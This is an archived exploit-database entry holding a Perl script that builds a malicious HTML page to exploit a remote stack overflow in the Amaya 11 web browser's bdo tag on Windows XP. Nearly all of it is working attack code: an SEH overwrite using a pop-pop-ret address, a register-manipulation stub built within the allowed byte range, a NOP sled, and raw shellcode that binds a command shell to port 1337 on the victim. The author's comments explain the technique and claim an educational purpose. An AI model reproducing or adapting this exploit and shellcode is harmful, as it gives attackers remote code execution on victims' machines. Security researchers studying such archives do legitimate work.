Amaya Web Browser 11 (Windows XP) - bdo tag Remote Stack Overflow

EDB-ID:

7988

CVE:

N/A




Platform:

Windows

Date:

2009-02-04


#!/usr/bin/perl

#####################################################
#
#   Amaya 11 bdo tag remote stack overflow exploit
#
#   author: Rob Carter (cartrel@hotmail.com)
#
#   affects: winxp sp0-3
#
#   this vulnerability only allows hex bytes
#   between 0x01 and 0x7f to get to the stack
#   unchanged. overwrote SEH with compatible addr
#   of a pop pop ret, manipulated eax register
#   with instructions whose opcodes fell within
#   the acceptable range and then used a ret to
#   force eip to another memory range where the
#   payload was still intact, allowing me to use
#   standard metasploit shellcode with no special
#   encoders.
#
#   i was able to get this working in sp2-3 VERY
#   easily because none of amaya's modules were
#   compiled with the /SAFESEH option so i was
#   able to just overwrite SEH with the address
#   of a pop pop ret in wxmsw2_2 (0x02101917) and
#   execution was returned to my shellcode.
#
#   binds a shell to port 1337 of the victim
#
#   $ perl amaya_sploit.pl > pwn.html
#
#   the author is not responsible for any misuse of
#   this code. it is intended for educational
#   purposes only
#
#####################################################

$shellcode =
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45".
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49".
"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d".
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66".
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61".
"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40".
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32".
"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6".
"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09".
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0".
"\x66\x68\x05\x39\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff".
"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53".
"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff".
"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64".
"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89".
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab".
"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51".
"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53".
"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6".
"\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0";

$payload = "<bdo dir=\"".
'A' x 6889 .
"\x74\x06\x41\x41".		# jmp short 06
"\x17\x19\x10\x02".		# 0x02101917 - pop pop ret in amaya module
"\x68\x7f\x01\x01\x7f".		# push 7f01017f
"\x58".				# pop eax
"\x2d\x18\x69\x45\x7d".		# sub eax,7a7a0857
"\x50".				# push eax
"\xc3".				# retn
"\x90" x 100 .
$shellcode.
"\">pwnd!</bdo>";

print $payload;

# milw0rm.com [2009-02-04]